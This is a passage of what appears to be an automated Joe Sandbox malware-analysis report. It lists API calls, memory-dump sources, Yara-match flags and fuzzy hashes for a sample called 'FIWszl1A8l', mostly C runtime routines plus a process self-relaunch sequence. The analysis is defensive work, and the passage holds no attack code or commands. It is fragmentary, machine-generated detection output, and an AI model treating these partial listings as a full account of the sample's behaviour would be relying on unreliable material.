                                                                                                    • Part of subcall function 009298E6: __getptd_noexit.LIBCMT ref: 009298E9
                                                                                                    • Part of subcall function 009298E6: __amsg_exit.LIBCMT ref: 009298F6
                                                                                                  • __getptd.LIBCMT ref: 009336BA
                                                                                                  • __getptd.LIBCMT ref: 009336C8
                                                                                                  • __getptd.LIBCMT ref: 009336D3
                                                                                                    • Part of subcall function 009332D7: __CallSettingFrame@12.LIBCMT ref: 00933323
                                                                                                    • Part of subcall function 009337A0: __getptd.LIBCMT ref: 009337AF
                                                                                                    • Part of subcall function 009337A0: __getptd.LIBCMT ref: 009337BD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 3282538202-0
                                                                                                  APIs
                                                                                                  • __CreateFrameInfo.LIBCMT ref: 0283FF95
                                                                                                    • Part of subcall function 0283FA76: __getptd.LIBCMT ref: 0283FA84
                                                                                                    • Part of subcall function 0283FA76: __getptd.LIBCMT ref: 0283FA92
                                                                                                  • __getptd.LIBCMT ref: 0283FF9F
                                                                                                    • Part of subcall function 0283381A: __getptd_noexit.LIBCMT ref: 0283381D
                                                                                                    • Part of subcall function 0283381A: __amsg_exit.LIBCMT ref: 0283382A
                                                                                                  • __getptd.LIBCMT ref: 0283FFAD
                                                                                                  • __getptd.LIBCMT ref: 0283FFBB
                                                                                                  • __getptd.LIBCMT ref: 0283FFC6
                                                                                                    • Part of subcall function 0283FB1B: __CallSettingFrame@12.LIBCMT ref: 0283FB67
                                                                                                    • Part of subcall function 02840093: __getptd.LIBCMT ref: 028400A2
                                                                                                    • Part of subcall function 02840093: __getptd.LIBCMT ref: 028400B0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 3282538202-0
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02D04B83
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02D04B8D
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02D04BA0
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02D04BA3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3168844106-0
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 00974B63
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 00974B6D
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 00974B80
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 00974B83
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3168844106-0
                                                                                                  APIs
                                                                                                  • __CreateFrameInfo.LIBCMT ref: 03FC4891
                                                                                                    • Part of subcall function 03FC4372: __getptd.LIBCMT ref: 03FC4380
                                                                                                    • Part of subcall function 03FC4372: __getptd.LIBCMT ref: 03FC438E
                                                                                                  • __getptd.LIBCMT ref: 03FC489B
                                                                                                    • Part of subcall function 03FB8116: __getptd_noexit.LIBCMT ref: 03FB8119
                                                                                                    • Part of subcall function 03FB8116: __amsg_exit.LIBCMT ref: 03FB8126
                                                                                                  • __getptd.LIBCMT ref: 03FC48A9
                                                                                                  • __getptd.LIBCMT ref: 03FC48B7
                                                                                                  • __getptd.LIBCMT ref: 03FC48C2
                                                                                                    • Part of subcall function 03FC4417: __CallSettingFrame@12.LIBCMT ref: 03FC4463
                                                                                                    • Part of subcall function 03FC498F: __getptd.LIBCMT ref: 03FC499E
                                                                                                    • Part of subcall function 03FC498F: __getptd.LIBCMT ref: 03FC49AC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 3282538202-0
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 0092E122
                                                                                                    • Part of subcall function 009298E6: __getptd_noexit.LIBCMT ref: 009298E9
                                                                                                    • Part of subcall function 009298E6: __amsg_exit.LIBCMT ref: 009298F6
                                                                                                  • __getptd.LIBCMT ref: 0092E139
                                                                                                  • __amsg_exit.LIBCMT ref: 0092E147
                                                                                                  • __lock.LIBCMT ref: 0092E157
                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0092E16B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 938513278-0
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 028349D1
                                                                                                    • Part of subcall function 0283381A: __getptd_noexit.LIBCMT ref: 0283381D
                                                                                                    • Part of subcall function 0283381A: __amsg_exit.LIBCMT ref: 0283382A
                                                                                                  • __getptd.LIBCMT ref: 028349E8
                                                                                                  • __amsg_exit.LIBCMT ref: 028349F6
                                                                                                  • __lock.LIBCMT ref: 02834A06
                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 02834A1A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 938513278-0
                                                                                                  • Opcode ID: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                  • Instruction ID: 87628369c2ce08f4dd71a081f50df1d18e4c4241a69643bde6eba6d1d95684df
                                                                                                  • Opcode Fuzzy Hash: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                  • Instruction Fuzzy Hash: B1F0903E9012109AE623BBAC980178936A1BF00725F258289E808E72E1DB245941DEDB
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 02D15012
                                                                                                    • Part of subcall function 02D13E5B: __getptd_noexit.LIBCMT ref: 02D13E5E
                                                                                                    • Part of subcall function 02D13E5B: __amsg_exit.LIBCMT ref: 02D13E6B
                                                                                                  • __getptd.LIBCMT ref: 02D15029
                                                                                                  • __amsg_exit.LIBCMT ref: 02D15037
                                                                                                  • __lock.LIBCMT ref: 02D15047
                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 02D1505B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 938513278-0
                                                                                                  • Opcode ID: eaa3632ecbea9e7a61c79dcc7ab112c486802fb1a39adde2abbc5c23db95dc7b
                                                                                                  • Instruction ID: 87691819891328121922738fa0afa11f70ea2875ca6003b73db2f982d6496fae
                                                                                                  • Opcode Fuzzy Hash: eaa3632ecbea9e7a61c79dcc7ab112c486802fb1a39adde2abbc5c23db95dc7b
                                                                                                  • Instruction Fuzzy Hash: 15F09032944711FAEAB0BBA8B401B8D73A2EF40B24F610249D559A7FC1CB388C41DEA5
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 0097E14B
                                                                                                    • Part of subcall function 0097990F: __getptd_noexit.LIBCMT ref: 00979912
                                                                                                    • Part of subcall function 0097990F: __amsg_exit.LIBCMT ref: 0097991F
                                                                                                  • __getptd.LIBCMT ref: 0097E162
                                                                                                  • __amsg_exit.LIBCMT ref: 0097E170
                                                                                                  • __lock.LIBCMT ref: 0097E180
                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0097E194
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 938513278-0
                                                                                                  • Opcode ID: ca48fa60cd8d0aa2b7bd3c538dda4f9da509cb376760db836b0518020fbc311f
                                                                                                  • Instruction ID: aab4ee1a7ea3d3c9e86cee74c9bb3dbec45af328bca7be14bb3736ddee28702b
                                                                                                  • Opcode Fuzzy Hash: ca48fa60cd8d0aa2b7bd3c538dda4f9da509cb376760db836b0518020fbc311f
                                                                                                  • Instruction Fuzzy Hash: D3F0903394C6109BE721BBB8980375932A0AF84B20F54C18DF46DA72D2CF744900DA59
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 03FB92CD
                                                                                                    • Part of subcall function 03FB8116: __getptd_noexit.LIBCMT ref: 03FB8119
                                                                                                    • Part of subcall function 03FB8116: __amsg_exit.LIBCMT ref: 03FB8126
                                                                                                  • __getptd.LIBCMT ref: 03FB92E4
                                                                                                  • __amsg_exit.LIBCMT ref: 03FB92F2
                                                                                                  • __lock.LIBCMT ref: 03FB9302
                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 03FB9316
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 938513278-0
                                                                                                  • Opcode ID: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                  • Instruction ID: aca22084980d75155507946b36bd5ff7ea9f179ad1d20b6f8e07af068154efae
                                                                                                  • Opcode Fuzzy Hash: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                  • Instruction Fuzzy Hash: 22F0B4BAD09710DBEB61FB7A8C027CE77B8AF00760F19011DD6456F2D0CBA44940CA56
                                                                                                  APIs
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 02D0C932
                                                                                                  • GetCommandLineW.KERNEL32 ref: 02D0C938
                                                                                                  • GetStartupInfoW.KERNEL32(?), ref: 02D0C947
                                                                                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 02D0C96F
                                                                                                  • ExitProcess.KERNEL32 ref: 02D0C977
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                  • String ID:
                                                                                                  • API String ID: 3421218197-0
                                                                                                  • Opcode ID: b29413f53a7b2381ab1757795e4a6a5dcfe81d7365e391f78b016ca51a8838f5
                                                                                                  • Instruction ID: e833decc44404733ba3c431d22416ab4bfe33d73a35a67c02e087a1d2b64bbc1
                                                                                                  • Opcode Fuzzy Hash: b29413f53a7b2381ab1757795e4a6a5dcfe81d7365e391f78b016ca51a8838f5
                                                                                                  • Instruction Fuzzy Hash: 4AF090319C4318BBEB309BA0DC4DFEA7778FB14B00F210694BB19A61C4DA706E58CB54
                                                                                                  APIs
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 02D075D2
                                                                                                  • GetCommandLineW.KERNEL32 ref: 02D075D8
                                                                                                  • GetStartupInfoW.KERNEL32(?), ref: 02D075E7
                                                                                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 02D0760F
                                                                                                  • ExitProcess.KERNEL32 ref: 02D07617
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                  • String ID:
                                                                                                  • API String ID: 3421218197-0
                                                                                                  • Opcode ID: 52542ce28f7ca2929899bbc27f411c7b31259ef27ef5098b5dc2cfb0c2edafb7
                                                                                                  • Instruction ID: 90bebdca9055e27c05a84baac6820d7c3143a4e615044583bc954f3766747dd8
                                                                                                  • Opcode Fuzzy Hash: 52542ce28f7ca2929899bbc27f411c7b31259ef27ef5098b5dc2cfb0c2edafb7
                                                                                                  • Instruction Fuzzy Hash: D2F0B4719C4319BBE7309BA0DC4DFD97778EB14B00F610694BB19A61C4DA706E58CF54
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D11CD0: _doexit.LIBCMT ref: 02D11CDC
                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 02D0F9CA
                                                                                                    • Part of subcall function 02D13CA0: TlsGetValue.KERNEL32(00000000,02D13DF9,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000), ref: 02D13CA9
                                                                                                    • Part of subcall function 02D13CA0: DecodePointer.KERNEL32(?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000,?,02D13F06,0000000D), ref: 02D13CBB
                                                                                                    • Part of subcall function 02D13CA0: TlsSetValue.KERNEL32(00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000,?,02D13F06), ref: 02D13CCA
                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 02D0F9D5
                                                                                                    • Part of subcall function 02D13C80: TlsGetValue.KERNEL32(?,?,02D0F9DA,00000000), ref: 02D13C8E
                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 02D0F9E8
                                                                                                    • Part of subcall function 02D13CD4: DecodePointer.KERNEL32(?,?,?,02D0F9ED,00000000,?,00000000), ref: 02D13CE5
                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 02D0F9F1
                                                                                                  • ExitThread.KERNEL32 ref: 02D0F9F8
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D0F9FE
                                                                                                  • __freefls@4.LIBCMT ref: 02D0FA1E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 781180411-0
                                                                                                  • Opcode ID: 064f8d9c8eafe756d484cbeb99a3e882f24c2b38b1bcf9fd9dc1e3c7e1b0c7dc
                                                                                                  • Instruction ID: dbbacf5e7404b25952ddcf5573bb0b19c48469f0edac27c92bbd57ab74c60148
                                                                                                  • Opcode Fuzzy Hash: 064f8d9c8eafe756d484cbeb99a3e882f24c2b38b1bcf9fd9dc1e3c7e1b0c7dc
                                                                                                  • Instruction Fuzzy Hash: 38E04F31C402157B8F5037B2AD0CA8E7A1FDE00381F210480FE04A3B10EE24DD91CBB1
                                                                                                  APIs
                                                                                                    • Part of subcall function 009782F0: _doexit.LIBCMT ref: 009782FC
                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 009771BC
                                                                                                    • Part of subcall function 00979754: TlsGetValue.KERNEL32(00000000,009798AD,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000), ref: 0097975D
                                                                                                    • Part of subcall function 00979754: DecodePointer.KERNEL32(?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000,?,009799BA,0000000D), ref: 0097976F
                                                                                                    • Part of subcall function 00979754: TlsSetValue.KERNEL32(00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000,?,009799BA), ref: 0097977E
                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 009771C7
                                                                                                    • Part of subcall function 00979734: TlsGetValue.KERNEL32(?,?,009771CC,00000000), ref: 00979742
                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 009771DA
                                                                                                    • Part of subcall function 00979788: DecodePointer.KERNEL32(?,?,?,009771DF,00000000,?,00000000), ref: 00979799
                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 009771E3
                                                                                                  • ExitThread.KERNEL32 ref: 009771EA
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009771F0
                                                                                                  • __freefls@4.LIBCMT ref: 00977210
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 781180411-0
                                                                                                  • Opcode ID: a8f3861582775e4144096f0e87e531ffc4ff7a936c2e7efd4eaff789d9c310d4
                                                                                                  • Instruction ID: 6752af9f81bea024345ff23c601fe9c8fa585cf940102fb2a4423aa052626d11
                                                                                                  • Opcode Fuzzy Hash: a8f3861582775e4144096f0e87e531ffc4ff7a936c2e7efd4eaff789d9c310d4
                                                                                                  • Instruction Fuzzy Hash: 74E04F3781960967CF043FF18D0EB9F7A2CDE81354F10C800FA1897112DA28980187A5
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_vswprintf_s
                                                                                                  • String ID: D
                                                                                                  • API String ID: 3424173483-2746444292
                                                                                                  • Opcode ID: c8561399999e88f50518954755fe2256d0c041f48f054e3226c8471d41118f6d
                                                                                                  • Instruction ID: f0fad18f47caea0b84a0a3c42c6efbdaf0205cab15a916844266ed421c25e65b
                                                                                                  • Opcode Fuzzy Hash: c8561399999e88f50518954755fe2256d0c041f48f054e3226c8471d41118f6d
                                                                                                  • Instruction Fuzzy Hash: 354165B0A40318EFE721DB60DC85FAA77BCAF58704F50859CF64DAA184D6B1DA84CF94
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_vswprintf_s
                                                                                                  • String ID: D
                                                                                                  • API String ID: 3424173483-2746444292
                                                                                                  • Opcode ID: cf7116fa26cd05665a4fc66a2bfa2b13dadcbba7699ed49424b3b1d6dc26d4e0
                                                                                                  • Instruction ID: 4a1c27a510af990165b335169046a7d1f20e316ce7c14faa62b393221d392686
                                                                                                  • Opcode Fuzzy Hash: cf7116fa26cd05665a4fc66a2bfa2b13dadcbba7699ed49424b3b1d6dc26d4e0
                                                                                                  • Instruction Fuzzy Hash: 3941C5B9900228ABEB20DB65DC94FDEB7BCAB48700F1041D9E60DE6180EBB05BC5CF54
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_vswprintf_s
                                                                                                  • String ID: D
                                                                                                  • API String ID: 3424173483-2746444292
                                                                                                  • Opcode ID: cf7116fa26cd05665a4fc66a2bfa2b13dadcbba7699ed49424b3b1d6dc26d4e0
                                                                                                  • Instruction ID: 02b698feb956edb2b7dfc3caac796f3436b8c13be172f77540ec6da27e719fbf
                                                                                                  • Opcode Fuzzy Hash: cf7116fa26cd05665a4fc66a2bfa2b13dadcbba7699ed49424b3b1d6dc26d4e0
                                                                                                  • Instruction Fuzzy Hash: 9841A4B1A00358ABEB20DBA5DC84FDE77BCAB48700F5041D9E60DA61C0EAB05B85CF64
                                                                                                  APIs
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D0944A
                                                                                                    • Part of subcall function 02D0EF86: std::exception::exception.LIBCMT ref: 02D0EF9B
                                                                                                    • Part of subcall function 02D0EF86: __CxxThrowException@8.LIBCMT ref: 02D0EFB0
                                                                                                    • Part of subcall function 02D0EF86: std::exception::exception.LIBCMT ref: 02D0EFC1
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D09482
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF4E
                                                                                                    • Part of subcall function 02D0EF39: __CxxThrowException@8.LIBCMT ref: 02D0EF63
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF74
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 1823113695-4289949731
                                                                                                  • Opcode ID: 4cd4e5b097fdb645109da70b0679657d9fb6966f7bfaf7d306a3f7f7c0747a3f
                                                                                                  • Instruction ID: 67c284fc0e564035f78e1bcd2c0164ffccc6f60a2beb986d52b40be229b4e0bb
                                                                                                  • Opcode Fuzzy Hash: 4cd4e5b097fdb645109da70b0679657d9fb6966f7bfaf7d306a3f7f7c0747a3f
                                                                                                  • Instruction Fuzzy Hash: 492184327042108BD720996CF8D0BDAF7D9EB91A64F60092BE192CB7E2D761DC44C7A5
                                                                                                  APIs
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D084C9
                                                                                                    • Part of subcall function 02D0EF86: std::exception::exception.LIBCMT ref: 02D0EF9B
                                                                                                    • Part of subcall function 02D0EF86: __CxxThrowException@8.LIBCMT ref: 02D0EFB0
                                                                                                    • Part of subcall function 02D0EF86: std::exception::exception.LIBCMT ref: 02D0EFC1
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D084E7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 963545896-4289949731
                                                                                                  • Opcode ID: 6f31d4bf3a6669b4e92f3b2d56dc492048398f272334cb94bb54019a9c106da4
                                                                                                  • Instruction ID: 9886620dd4c0fc0630fbeb39416b78f58a4ae40f1065f51938a092fe11cfd4c2
                                                                                                  • Opcode Fuzzy Hash: 6f31d4bf3a6669b4e92f3b2d56dc492048398f272334cb94bb54019a9c106da4
